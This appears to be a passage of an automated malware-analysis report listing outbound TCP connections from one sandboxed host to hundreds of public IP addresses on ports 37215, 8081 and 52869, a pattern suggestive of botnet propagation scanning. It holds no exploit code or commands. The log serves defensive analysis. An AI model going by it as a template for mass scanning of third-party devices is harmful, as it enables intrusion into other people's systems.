                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.207.137.198:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.139.160.123:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.131.35.179:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 107.108.87.68:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 198.44.25.163:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.148.42.236:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.117.201.95:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.186.225.4:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.94.126.197:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.213.5.54:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.232.92.181:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 14.15.239.135:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.67.186.142:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.222.17.8:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.29.142.41:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 75.199.76.72:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.110.36.187:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 46.175.191.4:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.6.217.69:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.117.205.227:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.64.7.135:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.84.177.221:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.248.123.9:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.76.16.206:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.56.64.166:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.40.236.6:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.5.66.76:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.131.167.125:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 188.32.173.111:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.172.19.9:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.47.249.178:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 2.160.148.249:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.130.101.84:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.251.5.132:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 77.118.5.191:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 175.173.185.194:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 217.32.33.86:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 77.103.233.215:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.196.235.235:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.119.139.136:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 173.230.105.49:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 98.100.176.215:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.110.242.82:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.124.91.115:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.109.36.223:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.25.86.115:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.245.245.178:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 13.184.225.51:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 4.110.85.251:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.240.199.50:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.1.175.237:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.128.21.181:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.249.129.131:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.38.123.120:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.141.124.157:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.75.189.55:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 122.222.181.132:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.165.41.250:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.192.104.222:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.213.76.48:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.169.142.207:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.217.120.155:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.198.237.151:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.185.246.190:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 107.139.219.68:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 137.147.87.172:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.63.218.191:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 142.20.189.38:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.132.131.69:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.205.43.21:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.143.4.117:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.92.57.159:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.196.48.175:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.73.21.156:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.111.60.11:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.43.133.194:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.52.249.224:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.244.129.16:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.132.86.74:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.114.18.9:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 169.205.43.241:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.243.91.253:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.36.229.166:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.79.29.32:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 182.102.31.222:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.188.100.23:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.76.61.178:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.236.192.253:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 36.68.239.127:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.66.131.124:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.197.130.45:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.52.92.102:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.198.194.144:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.111.74.107:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.64.80.133:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.5.176.176:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.47.188.8:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.187.8.244:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.200.0.234:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 116.146.189.143:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.62.145.25:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.45.27.125:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 107.179.140.53:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.65.245.105:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 78.190.51.79:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.69.179.157:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.95.255.20:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.19.162.106:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.8.209.227:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.169.124.26:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.167.189.163:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.49.55.57:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.196.42.166:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.195.80.232:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.19.61.82:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.35.52.189:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.60.217.83:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 5.116.65.190:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.63.138.62:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 70.217.246.9:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.116.75.86:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.79.143.246:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.134.157.239:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.35.52.23:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.12.220.171:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.9.189.63:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 52.194.252.176:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 157.63.217.133:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 113.132.58.23:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.120.58.162:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.25.242.153:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 41.252.60.60:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.189.93.149:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 181.22.124.66:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 176.114.18.53:37215
                      Source: global trafficTCP traffic: 192.168.2.23:34477 -> 197.143.169.209:37215
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 165.83.86.189:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 191.189.55.135:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 27.92.33.187:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 31.254.206.145:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 91.130.196.71:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 198.50.246.46:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 153.129.111.29:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 69.135.152.58:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 79.87.222.247:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 162.88.219.206:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 110.90.71.250:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 158.113.146.43:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 157.217.88.36:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 209.221.156.98:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 103.122.90.220:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 49.49.107.76:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 116.5.187.7:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 176.159.56.7:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 177.95.54.71:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 121.152.93.241:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 129.66.19.4:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 86.189.116.244:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 182.241.162.14:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 195.218.137.89:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 101.167.238.79:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 221.225.197.171:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 42.37.47.7:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 191.158.189.2:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 8.145.37.187:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 119.196.179.139:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 78.220.143.116:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 130.192.156.155:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 183.232.41.59:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 68.41.70.255:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 219.185.132.28:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 40.34.22.17:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 71.33.35.123:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 42.11.33.26:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 14.240.127.137:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 113.230.96.58:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 40.204.235.232:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 121.11.165.132:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 180.150.232.28:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 123.41.132.40:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 67.27.81.222:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 40.128.147.134:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 67.126.95.220:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 67.146.206.6:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 51.210.198.118:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 13.201.247.1:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 45.29.220.56:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 110.138.50.100:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 44.246.32.7:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 45.154.193.96:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 69.163.38.91:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 5.212.63.8:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 65.226.156.101:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 62.145.56.184:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 83.20.70.35:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 136.141.153.70:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 99.31.70.158:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 85.16.45.188:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 150.211.33.207:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 8.92.127.66:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 143.178.252.246:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 202.218.212.3:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 67.253.170.233:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 121.107.250.116:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 79.214.171.15:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 32.26.120.233:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 157.132.243.78:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 222.51.117.113:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 197.124.121.19:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 135.134.34.28:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 50.238.59.193:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 126.203.110.229:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 50.129.227.225:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 102.118.189.255:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 39.251.53.179:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 50.166.250.192:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 91.55.81.201:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 116.31.165.18:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 160.20.175.254:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 221.124.98.36:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 146.31.29.110:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 186.199.72.114:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 58.209.208.205:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 174.211.130.59:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 209.57.96.146:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 213.64.167.149:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 77.232.27.69:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 47.26.45.215:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 13.154.39.145:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 35.61.103.70:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 61.254.65.221:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 74.113.80.174:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 96.99.34.154:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 95.74.8.198:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 51.1.78.152:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 211.145.32.152:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 203.12.152.184:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 113.50.102.50:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 151.107.112.214:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 138.111.21.139:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 144.111.168.245:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 36.61.132.121:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 201.77.170.14:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 35.100.103.23:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 206.223.137.129:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 186.49.44.43:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 125.22.92.96:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 158.125.86.92:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 133.222.62.78:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 161.216.18.180:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 210.148.47.191:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 52.47.117.27:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 18.200.102.195:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 91.28.193.161:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 141.128.229.14:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 83.149.186.96:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 78.218.78.120:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 37.155.128.10:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 169.22.153.45:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 69.10.172.90:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 212.52.36.237:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 43.197.192.55:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 173.235.121.4:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 77.112.142.207:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 63.116.244.27:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 202.229.106.73:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 34.114.207.159:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 170.73.241.135:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 173.229.229.160:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 18.107.60.115:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 8.73.54.84:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 178.182.17.7:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 85.152.134.60:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 143.150.127.195:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 152.74.63.149:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 41.112.53.105:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 112.255.154.1:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 151.1.119.221:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 112.156.107.90:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 78.212.124.172:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 76.228.73.89:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 119.6.66.14:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 102.74.118.227:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 72.157.8.7:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 151.211.137.114:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 196.220.216.134:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 17.109.245.152:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 150.114.206.96:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 223.85.222.224:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 212.56.216.147:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 34.71.3.144:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 154.88.5.173:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33197 -> 4.112.216.21:8081
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 189.75.86.189:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 164.189.55.135:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 199.214.91.137:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 157.202.7.129:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 12.55.180.198:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 199.61.238.254:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 133.66.91.121:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 131.199.217.59:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 189.63.115.173:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 9.91.73.111:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 207.223.182.162:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 100.7.167.160:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 142.90.33.83:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 5.1.90.206:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 184.60.97.199:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 213.46.179.130:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 195.67.134.63:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 117.49.51.0:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 191.79.195.70:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 188.92.250.125:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 47.237.197.200:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 27.254.228.216:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 109.80.210.12:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 54.250.134.170:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 206.208.92.27:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 153.15.211.214:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 151.5.114.8:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 161.98.32.121:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 160.189.204.148:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 205.32.150.55:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 24.167.37.167:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 13.18.63.141:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 176.229.44.248:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 216.174.225.184:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 129.167.170.254:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 148.117.206.184:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 25.68.235.59:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 114.57.93.253:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 41.215.81.142:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 190.124.94.237:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 90.243.193.156:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 155.42.58.223:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 27.130.132.139:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 207.30.132.8:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 162.220.3.30:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 212.114.230.189:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 82.63.31.170:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 119.187.229.164:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 193.14.204.18:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 173.57.134.38:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 60.63.234.192:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 25.222.248.206:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 49.39.36.55:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 36.193.87.124:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 9.190.28.75:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 173.195.200.196:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 87.1.160.57:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 23.94.137.105:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 126.16.187.60:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 157.99.82.194:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 218.167.11.188:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 137.195.128.162:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 75.207.187.133:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 45.158.122.120:52869
